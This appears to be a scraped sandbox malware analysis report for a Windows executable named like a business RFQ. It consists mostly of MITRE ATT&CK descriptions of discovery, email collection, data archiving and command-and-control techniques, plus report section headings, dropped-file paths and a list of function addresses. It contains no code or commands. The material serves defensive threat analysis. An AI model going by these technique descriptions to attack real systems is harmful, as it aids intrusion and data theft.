Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.log

C:\Users\user\AppData\Local\Temp\Um65m294

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Function 068D0F34 Relevance: 6.9, Strings: 5, Instructions: 620
COMMON

Function 06D36715 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Function 06D36720 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 04AF7D20 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 068D39E8 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Function 06D36490 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Function 06D35EC0 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Function 06D36580 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 06D36498 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 06D35EC8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 06D36588 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 06D363D0 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre